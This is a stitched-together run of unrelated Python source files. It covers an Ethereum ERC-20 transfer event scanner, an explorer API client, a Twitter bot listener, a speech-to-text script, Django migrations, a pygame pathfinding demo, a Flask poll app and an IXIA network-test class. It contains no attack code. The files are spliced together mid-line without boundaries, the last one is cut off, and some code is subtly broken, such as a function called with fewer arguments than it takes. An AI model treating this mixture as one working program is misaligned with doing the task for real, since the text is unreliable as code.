UTC time when this event happened (block mined timestamp) # from our in-memory cache block_when = get_block_when(block_number) logger.debug("Processing event %s, block:%d count:%d", evt["event"], evt["blockNumber"]) processed = self.state.process_event(block_when, evt) all_processed.append(processed) end_block_timestamp = get_block_when(end_block) return end_block, end_block_timestamp, all_processed def estimate_next_chunk_size(self, current_chuck_size: int, event_found_count: int): """Try to figure out optimal chunk size Our scanner might need to scan the whole blockchain for all events * We want to minimize API calls over empty blocks * We want to make sure that one scan chunk does not try to process too many entries once, as we try to control commit buffer size and potentially asynchronous busy loop * Do not overload node serving JSON-RPC API by asking data for too many events at a time Currently Ethereum JSON-API does not have an API to tell when a first event occurred in a blockchain and our heuristics try to accelerate block fetching (chunk size) until we see the first event. These heurestics exponentially increase the scan chunk size depending on if we are seeing events or not. When any transfers are encountered, we are back to scanning only a few blocks at a time. It does not make sense to do a full chain scan starting from block 1, doing one JSON-RPC call per 20 blocks. 
""" if event_found_count > 0: # When we encounter first events, reset the chunk size window current_chuck_size = self.min_scan_chunk_size else: current_chuck_size *= self.chunk_size_increase current_chuck_size = max(self.min_scan_chunk_size, current_chuck_size) current_chuck_size = min(self.max_scan_chunk_size, current_chuck_size) return int(current_chuck_size) def scan(self, start_block, end_block, start_chunk_size=20, progress_callback=Optional[Callable]) -> Tuple[ list, int]: """Perform a token balances scan. Assumes all balances in the database are valid before start_block (no forks sneaked in). :param start_block: The first block included in the scan :param end_block: The last block included in the scan :param start_chunk_size: How many blocks we try to fetch over JSON-RPC on the first attempt :param progress_callback: If this is an UI application, update the progress of the scan :return: [All processed events, number of chunks used] """ assert start_block <= end_block current_block = start_block # Scan in chunks, commit between chunk_size = start_chunk_size last_scan_duration = last_logs_found = 0 total_chunks_scanned = 0 # All processed entries we got on this scan cycle all_processed = [] while current_block <= end_block: self.state.start_chunk(current_block, chunk_size) # Print some diagnostics to logs to try to fiddle with real world JSON-RPC API performance estimated_end_block = current_block + chunk_size logger.debug( "Scanning token transfers for blocks: %d - %d, chunk size %d, last chunk scan took %f, last logs found %d", current_block, estimated_end_block, chunk_size, last_scan_duration, last_logs_found) start = time.time() actual_end_block, end_block_timestamp, new_entries = self.scan_chunk(current_block, estimated_end_block) # Where does our current chunk scan ends - are we out of chain yet? current_end = actual_end_block last_scan_duration = time.time() - start all_processed += new_entries # Print progress bar if progress_callback: progress_callback(start_block, end_block, current_block, end_block_timestamp, chunk_size, len(new_entries)) # Try to guess how many blocks to fetch over `eth_getLogs` API next time chunk_size = self.estimate_next_chunk_size(chunk_size, len(new_entries)) # Set where the next chunk starts current_block = current_end + 1 total_chunks_scanned += 1 self.state.end_chunk(current_end) return all_processed, total_chunks_scanned def _retry_web3_call(func, start_block, end_block, retries, delay) -> Tuple[int, list]: """A custom retry loop to throttle down block range. If our JSON-RPC server cannot serve all incoming `eth_getLogs` in a single request, we retry and throttle down block range for every retry. For example, Go Ethereum does not indicate what is an acceptable response size. It just fails on the server-side with a "context was cancelled" warning. :param func: A callable that triggers Ethereum JSON-RPC, as func(start_block, end_block) :param start_block: The initial start block of the block range :param end_block: The initial start block of the block range :param retries: How many times we retry :param delay: Time to sleep between retries """ for i in range(retries): try: return end_block, func(start_block, end_block) except Exception as e: # Assume this is HTTPConnectionPool(host='localhost', port=8545): Read timed out. (read timeout=10) # from Go Ethereum. 
This translates to the error "context was cancelled" on the server side: # https://github.com/ethereum/go-ethereum/issues/20426 if i < retries - 1: # Give some more verbose info than the default middleware logger.warning( "Retrying events for block range %d - %d (%d) failed with %s, retrying in %s seconds", start_block, end_block, end_block-start_block, e, delay) # Decrease the `eth_getBlocks` range end_block = start_block + ((end_block - start_block) // 2) # Let the JSON-RPC to recover e.g. from restart time.sleep(delay) continue else: logger.warning("Out of retries") raise def _fetch_events_for_all_contracts( web3, event, argument_filters: dict, from_block: int, to_block: int) -> Iterable: """Get events using eth_getLogs API. This method is detached from any contract instance. This is a stateless method, as opposed to createFilter. It can be safely called against nodes which do not provide `eth_newFilter` API, like Infura. """ if from_block is None: raise TypeError("Missing mandatory keyword argument to getLogs: fromBlock") # Currently no way to poke this using a public Web3.py API. # This will return raw underlying ABI JSON object for the event abi = event._get_event_abi() # Depending on the Solidity version used to compile # the contract that uses the ABI, # it might have Solidity ABI encoding v1 or v2. # We just assume the default that you set on Web3 object here. # More information here https://eth-abi.readthedocs.io/en/latest/index.html codec: ABICodec = web3.codec # Here we need to poke a bit into Web3 internals, as this # functionality is not exposed by default. # Construct JSON-RPC raw filter presentation based on human readable Python descriptions # Namely, convert event names to their keccak signatures # More information here: # https://github.com/ethereum/web3.py/blob/e176ce0793dafdd0573acc8d4b76425b6eb604ca/web3/_utils/filters.py#L71 data_filter_set, event_filter_params = construct_event_filter_params( abi, codec, address=argument_filters.get("address"), argument_filters=argument_filters, fromBlock=from_block, toBlock=to_block ) logger.debug("Querying eth_getLogs with the following parameters: %s", event_filter_params) # Call JSON-RPC API on your Ethereum node. # get_logs() returns raw AttributedDict entries logs = web3.eth.get_logs(event_filter_params) # Convert raw binary data to Python proxy objects as described by ABI all_events = [] for log in logs: # Convert raw JSON-RPC log result to human readable event by using ABI data # More information how processLog works here # https://github.com/ethereum/web3.py/blob/fbaf1ad11b0c7fac09ba34baff2c256cffe0a148/web3/_utils/events.py#L200 evt = get_event_data(codec, abi, log) # Note: This was originally yield, # but deferring the timeout exception caused the throttle logic not to work all_events.append(evt) return all_events if __name__ == "__main__": # Simple demo that scans all the token transfers of RCC token (11k). # The demo supports persistant state by using a JSON file. # You will need an Ethereum node for this. # Running this script will consume around 20k JSON-RPC calls. # With locally running Geth, the script takes 10 minutes. # The resulting JSON state file is 2.9 MB. 
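# In outline, the demo below restores any previous scan state from test-state.json, rewinds ten blocks for chain-reorg safety, scans the token's Transfer events in adaptively sized eth_getLogs chunks while drawing a tqdm progress bar, and finally persists the updated state back to disk.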
import sys import json from web3.providers.rpc import HTTPProvider # We use tqdm library to render a nice progress bar in the console # https://pypi.org/project/tqdm/ from tqdm import tqdm # RCC has around 11k Transfer events # https://etherscan.io/token/0x9b6443b0fb9c241a7fdac375595cea13e6b7807a RCC_ADDRESS = "0x9b6443b0fB9C241A7fdAC375595cEa13e6B7807A" # Reduced ERC-20 ABI, only Transfer event ABI = """[ { "anonymous": false, "inputs": [ { "indexed": true, "name": "from", "type": "address" }, { "indexed": true, "name": "to", "type": "address" }, { "indexed": false, "name": "value", "type": "uint256" } ], "name": "Transfer", "type": "event" } ] """ class JSONifiedState(EventScannerState): """Store the state of scanned blocks and all events. All state is an in-memory dict. Simple load/store massive JSON on start up. """ def __init__(self): self.state = None self.fname = "test-state.json" # How many second ago we saved the JSON file self.last_save = 0 def reset(self): """Create initial state of nothing scanned.""" self.state = { "last_scanned_block": 0, "blocks": {}, } def restore(self): """Restore the last scan state from a file.""" try: self.state = json.load(open(self.fname, "rt")) print(f"Restored the state, previously {self.state['last_scanned_block']} blocks have been scanned") except (IOError, json.decoder.JSONDecodeError): print("State starting from scratch") self.reset() def save(self): """Save everything we have scanned so far in a file.""" with open(self.fname, "wt") as f: json.dump(self.state, f) self.last_save = time.time() # # EventScannerState methods implemented below # def get_last_scanned_block(self): """The number of the last block we have stored.""" return self.state["last_scanned_block"] def delete_data(self, since_block): """Remove potentially reorganised blocks from the scan data.""" for block_num in range(since_block, self.get_last_scanned_block()): if block_num in self.state["blocks"]: del self.state["blocks"][block_num] def start_chunk(self, block_number, chunk_size): pass def end_chunk(self, block_number): """Save at the end of each block, so we can resume in the case of a crash or CTRL+C""" # Next time the scanner is started we will resume from this block self.state["last_scanned_block"] = block_number # Save the database file for every minute if time.time() - self.last_save > 60: self.save() def process_event(self, block_when: datetime.datetime, event: AttributeDict) -> str: """Record a ERC-20 transfer in our database.""" # Events are keyed by their transaction hash and log index # One transaction may contain multiple events # and each one of those gets their own log index # event_name = event.event # "Transfer" log_index = event.logIndex # Log index within the block # transaction_index = event.transactionIndex # Transaction index within the block txhash = event.transactionHash.hex() # Transaction hash block_number = event.blockNumber # Convert ERC-20 Transfer event to our internal format args = event["args"] transfer = { "from": args["from"], "to": args.to, "value": args.value, "timestamp": block_when.isoformat(), } # Create empty dict as the block that contains all transactions by txhash if block_number not in self.state["blocks"]: self.state["blocks"][block_number] = {} block = self.state["blocks"][block_number] if txhash not in block: # We have not yet recorded any transfers in this transaction # (One transaction may contain multiple events if executed by a smart contract). 
# Create a tx entry that contains all events by a log index self.state["blocks"][block_number][txhash] = {} # Record ERC-20 transfer in our database self.state["blocks"][block_number][txhash][log_index] = transfer # Return a pointer that allows us to look up this event later if needed return f"{block_number}-{txhash}-{log_index}" def run(): if len(sys.argv) < 2: print("Usage: eventscanner.py http://your-node-url") sys.exit(1) api_url = sys.argv[1] # Enable logs to the stdout. # DEBUG is very verbose level logging.basicConfig(level=logging.INFO) provider = HTTPProvider(api_url) # Remove the default JSON-RPC retry middleware # as it correctly cannot handle eth_getLogs block range # throttle down. provider.middlewares.clear() web3 = Web3(provider) # Prepare stub ERC-20 contract object abi = json.loads(ABI) ERC20 = web3.eth.contract(abi=abi) # Restore/create our persistent state state = JSONifiedState() state.restore() # chain_id: int, web3: Web3, abi: dict, state: EventScannerState, events: List, filters: {}, max_chunk_scan_size: int=10000 scanner = EventScanner( web3=web3, contract=ERC20, state=state, events=[ERC20.events.Transfer], filters={"address": RCC_ADDRESS}, # How many maximum blocks at the time we request from JSON-RPC # and we are unlikely to exceed the response size limit of the JSON-RPC server max_chunk_scan_size=10000 ) # Assume we might have scanned the blocks all the way to the last Ethereum block # that mined a few seconds before the previous scan run ended. # Because there might have been a minor Etherueum chain reorganisations # since the last scan ended, we need to discard # the last few blocks from the previous scan results. chain_reorg_safety_blocks = 10 scanner.delete_potentially_forked_block_data(state.get_last_scanned_block() - chain_reorg_safety_blocks) # Scan from [last block scanned] - [latest ethereum block] # Note that our chain reorg safety blocks cannot go negative start_block = max(state.get_last_scanned_block() - chain_reorg_safety_blocks, 0) end_block = scanner.get_suggested_scan_end_block() blocks_to_scan = end_block - start_block print(f"Scanning events from blocks {start_block} - {end_block}") # Render a progress bar in the console start = time.time() with tqdm(total=blocks_to_scan) as progress_bar: def _update_progress(start, end, current, current_block_timestamp, chunk_size, events_count): if current_block_timestamp: formatted_time = current_block_timestamp.strftime("%d-%m-%Y") else: formatted_time = "no block time available" progress_bar.set_description(f"Current block: {current} ({formatted_time}), blocks in a scan batch: {chunk_size}, events processed in a batch {events_count}") progress_bar.update(chunk_size) # Run the scan result, total_chunks_scanned = scanner.scan(start_block, end_block, progress_callback=_update_progress) state.save() duration = time.time() - start print(f"Scanned total {len(result)} Transfer events, in {duration} seconds, total {total_chunks_scanned} chunk scans performed") run()PluskitOfficial/nt_s_common import json import random import time import datetime import hashlib import requests from urllib import parse from nt_s_common import debug, utils, consts, decorator class XmBase(object): def __init__(self): self.host = consts.XM_HOST self.app_id = consts.XM_APP_ID self.app_version = '1.0.0' self.app_secret = consts.XM_APP_SECRET def getSignature(self): '''get signature''' nonce = str(random.randint(1000000000, 9999999999)) timestamp = str(int(datetime.datetime.timestamp(datetime.datetime.now()))) params = sorted([nonce, 
timestamp, self.app_secret]) sorted_params_str = ''.join(params) # calculate signature sha1 = hashlib.sha1() sha1.update(sorted_params_str.encode()) sign = sha1.hexdigest() return 'signature=%s×tamp=%s&nonce=%s' % (sign, timestamp, nonce) def getHeaders(self): '''set headers''' return { 'AppId': self.app_id, 'AppVersion': self.app_version, 'Signature': self.getSignature(), 'Content-type': 'application/x-www-form-urlencoded' } def fetch(self, url, data, timeout=60, repeat_time=3): for i in range(repeat_time): try: print('request url -------------------------->', url) print('post data -->', data) result = requests.post(url, headers=self.getHeaders(), data=data, timeout=timeout).json() print('response data -->', result) return result except Exception as e: print(e) if i >= repeat_time - 1: return {} else: continue def get_deal_list(self, data={}): """get deals """ url = self.host + '/explorer_v2/block_chain/get_deal_list' return self.fetch(url=url, data=data, timeout=30) def get_message_list(self, data={}): """get msg list""" url = self.host + '/explorer_v2/block_chain/get_message_list' return self.fetch(url=url, data=data, timeout=30) def get_message_info(self, data={}): """get msg details""" url = self.host + '/explorer_v2/block_chain/get_message_info' return self.fetch(url=url, data=data, timeout=30) import logging from responsebot.common.constants import TWITTER_NON_TWEET_EVENTS from responsebot.models import TweetFilter class ResponseBotListener(object): """ Forward received tweets from :class:`~responsebot.responsebot_stream.ResponseBotStream` """ def __init__(self, handler_classes, client): """ Inits the listener and tries to create handler instances from discovered user's handler classes :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes :param client: Some Twitter API client for authentication. E.g. :class:`~responsebot.tweet_client.TweetClient` """ self.client = client self.handlers = [] self.register_handlers(handler_classes) def register_handlers(self, handler_classes): """ Create handlers from discovered handler classes :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes """ for handler_class in handler_classes: self.handlers.append(handler_class(client=self.client)) logging.info('Successfully registered {handler_class}'.format( handler_class=getattr(handler_class, '__name__', str(handler_class))) ) def on_tweet(self, tweet): """ Callback to receive tweet from :class:`~responsebot.responsebot_stream.ResponseBotStream`. Tries to forward the received tweet to registered handlers. :param tweet: An object containing a tweet's text and metadata :type tweet: :class:`~responsebot.models.Tweet` """ logging.info(u'Received tweet: `{message}`'.format(message=tweet.text)) for handler in self.handlers: if not handler.catch_self_tweets and self.is_self_tweet(tweet): continue if not handler.filter.match_tweet(tweet=tweet, user_stream=self.client.config.get('user_stream')): continue handler.on_tweet(tweet) def on_event(self, event): """ Callback to receive events from :class:`~responsebot.responsebot_stream.ResponseBotStream`. Tries to forward the received event to registered handlers. 
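Events whose type is not listed in TWITTER_NON_TWEET_EVENTS are logged as unknown and ignored; the rest are passed to every registered handler's on_event().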
:param event: The received event :type event: :class:`~responsebot.models.Event` error from a custom handler """ if event.event not in TWITTER_NON_TWEET_EVENTS: logging.warning(u'Received unknown twitter event {event}'.format(event=event.event)) return logging.info(u'Received event {event}'.format(event=event.event)) for handler in self.handlers: handler.on_event(event) def is_self_tweet(self, tweet): return self.client.get_current_user().id == tweet.user.id def get_merged_filter(self): """ Return merged filter from list of handlers :return: merged filter :rtype: :class:`~responsebot.models.TweetFilter` """ track = set() follow = set() for handler in self.handlers: track.update(handler.filter.track) follow.update(handler.filter.follow) return TweetFilter(track=list(track), follow=list(follow)) import speech_recognition as sr import argparse import os import itertools import glob import re import logging import datetime import sys import pandas as pd import numpy logging.basicConfig(filename="./log/au_text.log", format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) def get_args(): desc = "is a speech to text script" epilog = ("-a directory of python files audio input -o name_file.txt both" "args are require") parser = argparse.ArgumentParser(description=desc, epilog=epilog, formatter_class=argparse .RawDescriptionHelpFormatter) parser.add_argument('-a', '--audio', help='path to dir audio files to transform in text', required=True) parser.add_argument('-o', '--out', help='name of file output', required=False) ret = parser.parse_args() return ret def audios(input_dirs): input_dirs = [os.path.expanduser(k) for k in input_dirs.strip().split()] # iterator dirs = itertools.chain(*(glob.glob(d) for d in input_dirs)) # generator dirs = [d for d in dirs if os.path.isdir(d)] if len(dirs) == 0: logger.info("No valid directory found!") sys.exit(1) for d in dirs: wavs = glob.glob(d + '/*.wav') if len(wavs) > 1: wavs = sorted(wavs) if len(wavs) == 0: logger.info("No wav file found in {0}".format(d)) sys.exit(1) else: return wavs def read_wav(audio): r = sr.Recognizer() telediario = sr.AudioFile(audio) with telediario as source: audio = r.record(source) return r, audio def audio_text(salida, r, audio, df): salida = salida.split('/')[-1] salida = re.match(r"(\w+)(-)([0-9.]+)(-)([0-9]+)", salida, re.I).groups() start = float(salida[2]) # /16000 end = float(salida[4]) # /16000 index_list = df.index.values true_table = (df['start'] + 1 > start) & (df['start'] - 1 < end) for i in range(len(index_list)): if numpy.bool(true_table[index_list[i]]) is True: last_index = index_list[i] start = int(start/16000) end = int(end/16000) try: csv_row = {'video_name': df['video_name'][last_index], 'label': df.loc[last_index]['label'], 'start_end': f'{start}-{end}', 'text': str(r.recognize_google(audio, language="es"))} row = pd.Series(csv_row) # df['text'][(df['start'] + 1 > start) & (df['start'] - 1 < end)] \ # = str(r.recognize_google(audio, language="es")) except sr.UnknownValueError as e: logger.warning(("couldn't do speech to text due lack of " f"data in audio: {salida[0]} time: {start}-{end}")) csv_row = {'label': df.loc[last_index]['label'], 'start_end': f'{start}-{end}', 'text': ''} row = pd.Series(csv_row) # start1 = str(datetime.timedelta(seconds=start/16000)) # end1 = str(datetime.timedelta(seconds=end/16000)) # df['start-date-time'][(df['start'] + 1 > start) & (df['start'] - 1 < end)]\ # = start1 # df['end-date-time'][(df['start'] + 1 > start) & 
(df['start'] - 1 < end)]\ # = end1 return row # df.to_csv('exit.csv') if __name__ == '__main__': args = get_args() wavs = audios(args.audio) try: for wav in wavs: r, audio = read_wav(wav) audio_text(wav, r, audio) except Exception as e: logger.warning(f'{e}') from verb_sense_srl.model import SenseSRLModel from verb_sense_srl.predictor import SenseSRLPredictor from verb_sense_srl.reader import SenseSRLReader # Generated by Django 2.1.2 on 2018-10-29 12:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('grafit', '0004_article_related'), ] operations = [ migrations.AlterField( model_name='article', name='related', field=models.ManyToManyField(blank=True, related_name='_article_related_+', to='grafit.Article'), ), migrations.AlterField( model_name='article', name='text', field=models.TextField(blank=True), ), ] main.py import pygame, pygame_gui import bfs, dijkstra, bellman_ford, a_star from random import randint from time import sleep from config import * class Node: def __init__(self, row, col, size): self.row = row self.col = col self.y = row * size self.x = col * size self.color = white self.size = size self.cost = 1 def addPosCost(self): self.cost = randint(0, 40) def addNegPosCost(self): self.cost = randint(-6, 999) def display(self, win): pygame.draw.rect(win, self.color, (self.x, self.y, self.size, self.size)) def drawSquare(win, node): node.display(win) pygame.draw.line(win, grey, (0, node.row * spacing), (size, node.row * spacing)) pygame.draw.line(win, grey, (node.col * spacing, 0), (node.col * spacing, size)) def drawBoard(win, manager, board): win.fill(white) pygame.draw.rect(win, (150, 150, 150), (0, size, size, 100)) for i in range(rows): board[i][0].color = black board[0][i].color = black board[rows - 1][i].color = black board[i][rows - 1].color = black for row in board: for node in row: node.display(win) for i in range(rows): pygame.draw.line(win, grey, (0, i * spacing), (size, i * spacing)) pygame.draw.line(win, grey, (i * spacing, 0), (i * spacing, size)) manager.draw_ui(win) pygame.display.update() def clickedPos(pos): x, y = pos row, col = y // spacing, x // spacing return row, col def main(): pygame.init() win = pygame.display.set_mode((size, size + 100)) pygame.display.set_caption("Shortest Path Finding Algorithms") manager = pygame_gui.UIManager((size, size + 100)) clock = pygame.time.Clock() bfs_button = pygame_gui.elements.UIButton(relative_rect = pygame.Rect(((5/80) * size, size + (1/32) * size), button_size), text = "BFS", manager=manager) dijkstra_button = pygame_gui.elements.UIButton(relative_rect = pygame.Rect(((2/8) * size, size + (1/32) * size), button_size), text = "DIJKSTRA", manager=manager) bellman_ford_button = pygame_gui.elements.UIButton(relative_rect = pygame.Rect(((35/80) * size, size + (1/32) * size), button_size), text = "BELLMAN-FORD", manager=manager) astar_button = pygame_gui.elements.UIButton(relative_rect = pygame.Rect(((5/8) * size, size + (1/32) * size), button_size), text = "A*", manager=manager) reset_button = pygame_gui.elements.UIButton(relative_rect = pygame.Rect(((65/80) * size, size + (1/32) * size), button_size), text = "RESET", manager=manager) board = [[Node(i, j, size // rows) for j in range(rows)] for i in range(rows)] startNode = None endNode = None running = True while running: time_delta = clock.tick(240)/1000.0 drawBoard(win, manager, board) for event in pygame.event.get(): if event.type == pygame.QUIT: running = False manager.process_events(event) if 
pygame.mouse.get_pressed()[0]: row, col = clickedPos(pygame.mouse.get_pos()) if 0 <= row < rows and 0 <= col < rows: node = board[row][col] if node.color != black: if not startNode: startNode = node startNode.color = yellow elif not endNode and node != startNode: endNode = node endNode.color = purple elif node != endNode and node != startNode: node.color = black elif pygame.mouse.get_pressed()[2]: row, col = clickedPos(pygame.mouse.get_pos()) if 0 <= row < rows and 0 <= col < rows: node = board[row][col] node.color = white if node == startNode: startNode = None elif node == endNode: endNode = None if event.type == pygame.USEREVENT: if event.user_type == pygame_gui.UI_BUTTON_PRESSED: if startNode and endNode: foundPath = None if event.ui_element == bfs_button: foundPath = bfs.BFS(lambda: drawBoard(win, manager, board), board, startNode, endNode) elif event.ui_element == dijkstra_button: for i in range(rows): for j in range(rows): board[i][j].addPosCost() foundPath = dijkstra.dijkstra(lambda: drawBoard(win, manager, board), board, startNode, endNode) elif event.ui_element == bellman_ford_button: for i in range(rows): for j in range(rows): board[i][j].addNegPosCost() foundPath = bellman_ford.BellmanFord(lambda: drawBoard(win, manager, board), win, board, startNode, endNode) if foundPath == False: myFont = pygame.font.SysFont("Comic Sans MS", int((5/80) * size)) text = myFont.render("The negative cycle has occured!", True, green) win.blit(text, (size // rows + (15/800) * size , size // 2)) pygame.display.update() sleep(4) elif event.ui_element == astar_button: foundPath = a_star.a_star(lambda: drawBoard(win, manager, board), board, startNode, endNode) elif event.ui_element == reset_button: startNode, endNode = None, None board = [[Node(i, j, size // rows) for j in range(rows)] for i in range(rows)] if not foundPath: sleep(0.5) startNode, endNode = None, None board = [[Node(i, j, size // rows) for j in range(rows)] for i in range(rows)] manager.update(time_delta) pygame.quit() if __name__ == "__main__": main()import flask import uuid import json from flask import request, url_for from db import couch, vote_view from cloudant.document import Document app = flask.Flask(__name__) @app.route('/', methods=['GET']) def index(): return app.send_static_file('index.html') @app.route('/create', methods=['POST']) def create(): data = request.get_json() data['_id'] = str(uuid.uuid4()) doc = couch.create_document(data) return doc['_id'], 201 @app.route('/poll/', methods=['GET', 'POST']) def read(poll_id): if request.method == 'GET': doc = Document(couch, poll_id) doc.fetch() return doc.json() if request.method == 'POST': data = request.get_json() data['pollID'] = poll_id data['remote_addr'] = request.remote_addr data['user_agent'] = request.headers.get('User-Agent') doc = couch.create_document(data) return doc['_id'], 201 @app.route('/results/', methods=['GET']) def results(poll_id): results = {} for row in vote_view(key=poll_id)['rows']: for key in row['value']['votes']: if key in results: results[key] += 1 else: results[key] = 1 return json.dumps(results) app.run(debug=False, host='0.0.0.0') # Copyright 1997 - 2018 by IXIA Keysight # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # 
Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from ixnetwork_restpy.base import Base from ixnetwork_restpy.files import Files class GroupDescriptionStatLearnedInformation(Base): """The GroupDescriptionStatLearnedInformation class encapsulates a system managed groupDescriptionStatLearnedInformation node in the ixnetwork hierarchy. An instance of the class can be obtained by accessing the GroupDescriptionStatLearnedInformation property from a parent instance. The internal properties list will be empty when the property is accessed and is populated from the server by using the find method. """ _SDM_NAME = 'groupDescriptionStatLearnedInformation' def __init__(self, parent): super(GroupDescriptionStatLearnedInformation, self).__init__(parent) @property def GroupBucketDescStatLearnedInformation(self): """An instance of the GroupBucketDescStatLearnedInformation class. Returns: obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.openflow.groupbucketdescstatlearnedinformation.GroupBucketDescStatLearnedInformation) Raises: NotFoundError: The requested resource does not exist on the server ServerError: The server has encountered an uncategorized error condition """ from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.openflow.groupbucketdescstatlearnedinformation import GroupBucketDescStatLearnedInformation return GroupBucketDescStatLearnedInformation(self) @property def DataPathId(self): """The Data Path ID of the connected switch. Returns: str """ return self._get_attribute('dataPathId') @property def DataPathIdAsHex(self): """The Data Path ID of the OpenFlow switch in hexadecimal format. Returns: str """ return self._get_attribute('dataPathIdAsHex') @property def ErrorCode(self): """The error code of the error received. Returns: str """ return self._get_attribute('errorCode') @property def ErrorType(self): """The type of the error received. Returns: str """ return self._get_attribute('errorType') @property def GroupId(self): """A 32-bit integer uniquely identifying the group. Returns: number """ return self._get_attribute('groupId') @property def GroupType(self): """Specify the group types supported by Switch. Returns: str """ return self._get_attribute('groupType') @property def Latency(self): """The latency measurement for the OpenFlow channel. Returns: number """ return self._get_attribute('latency') @property def LocalIp(self): """The local IP address of the selected interface. Returns: str """ return self._get_attribute('localIp') @property def NegotiatedVersion(self): """The OpenFlow version supported by this configuration. Returns: str """ return self._get_attribute('negotiatedVersion') @property def NumberOfBucketStats(self): """NOT DEFINED Returns: str """ return self._get_attribute('numberOfBucketStats') @property def RemoteIp(self): """The Remote IP address of the selected interface. 
Returns: str """ return self._get_attribute('remoteIp') @property def ReplyState(self): """The reply state of the OF Channel. Returns: str """ return self._get_attribute('replyState') def find(self, DataPathId=None, DataPathIdAsHex=None, ErrorCode=None, ErrorType=None, GroupId=None, GroupType=None, Latency=None, LocalIp=None, NegotiatedVersion=None, NumberOfBucketStats=None, RemoteIp=None, ReplyState=None): """Finds and retrieves groupDescriptionStatLearnedInformation data from the server. All named parameters support regex and can be used to selectively retrieve groupDescriptionStatLearnedInformation data from the server. By default the find method takes no parameters and will retrieve all groupDescriptionStatLearnedInformation data from the server. Args: DataPathId (str): The Data Path ID of the connected switch. DataPathIdAsHex (str): The Data Path ID of the OpenFlow switch in hexadecimal format. ErrorCode (str): The error code of the error received. ErrorType (str): The type of the error received. GroupId (number): A 32-bit integer uniquely identifying the group. GroupType (str): Specify the group types supported by Switch. Latency (number): The latency measurement for the OpenFlow channel. LocalIp (str): The local IP address of the selected interface. NegotiatedVersion (str): The OpenFlow version supported by this configuration. NumberOfBucketStats (str): NOT DEFINED RemoteIp (str): The Remote IP address of the selected interface. ReplyState (str): The reply state of the OF Channel. Returns: self: This instance with matching groupDescriptionStatLearnedInformation data retrieved from the server available through an iterator or index Raises: ServerError: The server has encountered an uncategorized error condition """ return self._select(locals()) def read(self, href): """Retrieves a single instance of groupDescriptionStatLearnedInformation data from the server. 
Args: href (str): An href to the instance to be retrieved Returns: self: This instance with the groupDescriptionStatLearnedInformation data from the server available through an iterator or index Raises: NotFoundError: The requested resource does not exist on the server ServerError: The server has encountered an uncategorized error condition """ return self._read(href) # Generated by Django 3.0.1 on 2020-06-06 20:14 from django.db import migrations, models import django.db.models.deletion import django.db.models.manager class Migration(migrations.Migration): initial = True dependencies = [ ('misc', '0001_initial'), ] operations = [ migrations.CreateModel( name='Tag', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=500)), ], ), migrations.CreateModel( name='WelcomeMessage', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('message', models.CharField(blank=True, max_length=20250)), ('language', models.CharField(choices=[('en', 'English'), ('nl', 'Dutch'), ('fr', 'French'), ('de', 'Deutsch'), ('tr', 'Turkish'), ('pt', 'Portuguese'), ('es', 'Spanish')], default='en', max_length=3)), ('message_type', models.IntegerField(choices=[(0, 'pre-boarding'), (1, 'new hire welcome'), (2, 'text welcome'), (3, 'slack welcome'), (4, 'slack knowledge')], default=0)), ], ), migrations.CreateModel( name='Organization', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=500)), ('language', models.CharField(choices=[('en', 'English'), ('nl', 'Dutch'), ('fr', 'French'), ('de', 'Deutsch'), ('tr', 'Turkish'), ('pt', 'Portuguese'), ('es', 'Spanish')], default='en', max_length=10)), ('timezone', models.CharField(default='UTC', max_length=1000)), ('base_color', models.CharField(default='#99835C', max_length=10)), ('accent_color', models.CharField(default='#ffbb42', max_length=10)), ('bot_color', models.CharField(default='#ffbb42', max_length=10)), ('credentials_login', models.BooleanField(default=True)), ('google_login', models.BooleanField(default=False)), ('slack_login', models.BooleanField(default=False)), ('new_hire_email', models.BooleanField(default=True)), ('new_hire_email_reminders', models.BooleanField(default=True)), ('new_hire_email_overdue_reminders', models.BooleanField(default=False)), ('slack_buttons', models.BooleanField(default=True)), ('ask_colleague_welcome_message', models.BooleanField(default=True)), ('send_new_hire_start_reminder', models.BooleanField(default=False)), ('logo', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='misc.File')), ], managers=[ ('object', django.db.models.manager.Manager()), ], ), ] scripts/pubchem/get_properties.py0 import pandas as pd import pubchempy as pcp def get_properties(dataframe, properties_list, source_column, name_prefix): """This function will retrieve chemical properties from the pubchem database by searching from their cid's. 
